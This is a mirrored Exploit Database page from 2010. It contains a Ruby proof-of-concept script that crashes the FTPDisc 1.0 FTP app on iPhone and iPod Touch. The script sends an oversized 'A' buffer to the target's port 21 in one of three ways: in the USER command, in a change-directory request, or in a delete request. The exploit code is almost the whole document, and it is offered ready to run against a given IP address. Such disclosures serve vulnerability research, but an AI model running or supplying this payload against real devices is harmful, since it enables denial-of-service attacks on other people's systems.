iPhone / iTouch FtpDisc 1.0 – Buffer Overflow (Denial of Service) (PoC)

• Exploit Database
• 131 阅读

• 作者： Alberto Ortega
  日期： 2010-03-01
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/11608/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71

  ############### # Title -> iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS # Model -> Tested on iPod Touch 3G 3.1.3 # Software -> FTPDisc 1.0 and FTPDisc 1.0 Lite http://itunes.apple.com/es/app/ftpdisc-lite-pdf-reader/id329157971?mt=8 # Attacker -> Tested from GNU/Linux (Sidux), fuzzing with a future PenTBox version :P # # Exploit languaje -> Ruby # Type -> Remote Denial of Service Exploit caused by Buffer Overflow # # ############### # Discovered and written by Alberto Ortega # http://pentbox.net/ ###############   require "socket" require "net/ftp"   expl = ARGV[0] host = ARGV[1]   puts "" if !expl || !host puts "HELP - iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS" puts "" puts "Exploits: 1 - USER [MALFORMED] 2 - cd [MALF] 3 - delete [MALF]" puts "" puts "- Usage: ftpdisc3io.rb [numberofexploit] [host]" puts "- Example: ftpdisc3io.rb 1 192.168.1.2" puts "" else buffer = "A" 10.times do buffer = "#{buffer}#{buffer}" # Here de big buffer to send end if expl == "1" # EXPLOIT 1 begin socket = TCPSocket.new(host, 21) puts "[*] Exploiting ..." socket.write("USER #{buffer}\r\n") puts "[*] Succesfully exploited! :)" rescue puts "Connection problem" end elsif expl == "2" || expl == "3" begin print "[*] Connecting to FTP ... " ftp = Net::FTP.new(host, "anonymous") puts "OK" puts "[*] Exploiting ..." if expl == "2" begin ftp.chdir(buffer) # EXPLOIT 2 rescue end else begin ftp.delete(buffer) # EXPLOIT 3 rescue end end puts "[*] Succesfully exploited! :)" rescue puts "Connection problem" end else puts "Incorrect exploit selection (1, 2, 3)" end end puts ""